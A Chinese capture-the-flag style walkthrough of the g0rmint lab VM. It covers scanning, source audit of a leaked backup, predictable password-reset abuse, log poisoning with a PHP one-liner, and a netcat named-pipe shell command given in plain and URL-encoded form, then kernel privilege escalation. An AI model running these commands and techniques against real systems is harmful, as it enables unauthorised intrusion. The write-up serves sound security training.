靶机实战(g0rmint)

实验环境

靶机:g0rmint
测试机:kali(IP:192.168.186.128),win10

实验过程

信息收集

主机发现

netdiscover -I eth0 -r 192.168.186.0/24
nmap -sn 192.168.186.0/24
arp-scan -l ,arp-scan 192.168.186.0/24

在这里插入图片描述

端口扫描

在这里插入图片描述

服务发现

在这里插入图片描述
查看web主页,没有主页
在这里插入图片描述

目录扫描

robots.txt
在这里插入图片描述

漏洞发现

找到/gormint/目录
在这里插入图片描述
在这里插入图片描述
查看网页源码关键字author,keyword尝试爆破,backup-directory备份文件
在这里插入图片描述
访问http://192.168.186.131/g0rmint/s3cretbackupdirect0ry/
在这里插入图片描述
再用dirb去扫该目录
在这里插入图片描述
关键字backup.zip,访问http://192.168.186.131/g0rmint/s3cretbackupdirect0ry/backup.zip下载
在这里插入图片描述
在这里插入图片描述

漏洞利用

源码审计
查看config.php文件,addlog函数添加日志文件,文件名年月日,在s3cr3t-dir3ct0ry-f0r-l0gs/目录下
在这里插入图片描述
查看login.php 将登录失败的邮箱添加到日志里
在这里插入图片描述
尝试用一句话作为邮箱登录,访问日志文件http://192.168.186.131/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-07-04.php。但需要登陆
在这里插入图片描述
查看reset.php,重置密码为年月日时分秒的sha1加密
在这里插入图片描述
css/style.css文件下找到用户名,邮箱
在这里插入图片描述
尝试重置密码
在这里插入图片描述
在这里插入图片描述
登录
在这里插入图片描述
重新访问日志文件
在这里插入图片描述
写入一句话
在这里插入图片描述
在这里插入图片描述

反弹shell

反弹shell(主要是通过创建管道通信连接)
‘mkfifo /tmp/t’;
‘cat /tmp/t | /bin/sh -i 2>&1 | nc -l 8888 > /tmp/t‘;
用url部分编码后分两步执行

%60mkfifo%20%2ftmp%2ft%60%3B

%60cat%20%2ftmp%2ft%20%7C%20%2fbin%2fsh%20-i%202%3E%261%20%7C%20nc%20-l%208888%20%3E%20%2ftmp%2ft%60%3B

在这里插入图片描述

提权

版本提权
在这里插入图片描述
在这里插入图片描述
编译
在这里插入图片描述
开启简易web服务python -m SimpleHTTPServer 8080
在这里插入图片描述
下载运行
在这里插入图片描述
在这里插入图片描述

总结

1.基本的源码审计,也可找网站对应的cms源码,进行审计.
2.对于日志文件(ssh登录,web访问,web登录等),写入一句话访问,或利用文件包含进行访问,解析漏洞等进行访问.

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值